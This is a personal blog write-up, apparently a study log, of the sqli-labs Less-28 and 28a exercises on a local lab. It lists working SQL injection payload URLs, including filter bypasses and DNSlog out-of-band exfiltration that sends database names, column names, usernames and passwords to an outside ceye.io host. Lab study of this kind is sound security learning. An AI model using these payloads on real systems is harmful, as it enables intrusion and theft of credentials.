SQLi-28,28a

28

基于错误_GET_过滤UNION/SELECT_单引号_小括号_字符型_盲注*

http://127.0.0.1/sqli-labs/Less-28/?id=1' or '1  #已经构造好闭合。

 

 

 个人学习方法,看别人攻略,最重要的是看原理!

越来越想打人,其实没有什么实际意义,推荐:简书  =》理由比较好  看源码

 

 

  1'or'1

过滤了空格,order by 先

http://127.0.0.1/sqli-labs/Less-28/?id=1'%09order%09by%091%09or%09'1

 

 很明显语句不行,

http://127.0.0.1/sqli-labs/Less-28/?id=1'%09ununionion%09selselectect%091,2,3or%09'1  双写绕过失败

1' ununionion selselectect 1,2,3or '1

查看源码

 

 闭合出错了

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09order%09by%091%09or('1  #OK  =》正确的闭合方式

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09order%09by%095%09or('1    =》order by 没有效果 

 

 

 这个没有代码基础的人写的,写出查询SQL语句的代码

 

 然后在这里查询。这样让我这个菜鸟无从入手。and updatexml 我想到这个函数

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09(updatexml(1,concat(0x7e,(select%09database()),0x7e),1))or('1  #这个方法不行。

其实我也很无解。。。。菜是原罪呀!别人的博客都是写着写着把自己不懂的忽略掉=》直接union

很明显可以注入成功,而在测试时注入失败。

http://127.0.0.1/sqli-labs/Less-28/?id=0')%09union%09union%09select%09select%093,(updatexml(1,concat(0x7e,(select%09database()),0x7e),1)),5,database()%09or%09('2

 

 ε=(´ο`*)))唉难受,为了完成这个,在玩一次Dnslog注入

 http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09load_file(concat('\\',(select%09user()),'.reh927.ceye.io\sql'))%09or%09('1

死啃,第二天玩起,盲注好烦

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09database()),'.reh927.ceye.io\\abc'))%09||%09('1  #数据库

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09table_name%09from%09information_schema.tables%09where%09table_schema=database()%09limit%093,1),'.reh927.ceye.io\\abc'))%09||%09('1  #表

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09column_name%09from%09information_schema.columns%09where%09table_name='users'%09limit%097,1),'.reh927.ceye.io\\abc'))%09||%09('1  #字段username

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09column_name%09from%09information_schema.columns%09where%09table_name='users'%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  #字段password

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09username%09from%09users%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  #username数据stupid 

http://127.0.0.1/sqli-labs/Less-28/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09password%09from%09users%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  #password数据stupidity

 28a

闭合') 跟28一样

 

 

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09database()),'.reh927.ceye.io\\abc'))%09||%09('1  #数据库

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09table_name%09from%09information_schema.tables%09where%09table_schema=database()%09limit%093,1),'.reh927.ceye.io\\abc'))%09||%09('1  #表

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09column_name%09from%09information_schema.columns%09where%09table_name='users'%09limit%097,1),'.reh927.ceye.io\\abc'))%09||%09('1  #字段username

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09column_name%09from%09information_schema.columns%09where%09table_name='users'%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  #字段password

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09username%09from%09users%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  #username数据stupid 

http://127.0.0.1/sqli-labs/Less-28a/?id=1')%09and%09LOAD_FILE(CONCAT('\\\\',(SELECT%09password%09from%09users%09limit%094,1),'.reh927.ceye.io\\abc'))%09||%09('1  #password数据stupidity

posted @ 2020-04-29 12:51  llcnKill  阅读(267)  评论(0)    收藏  举报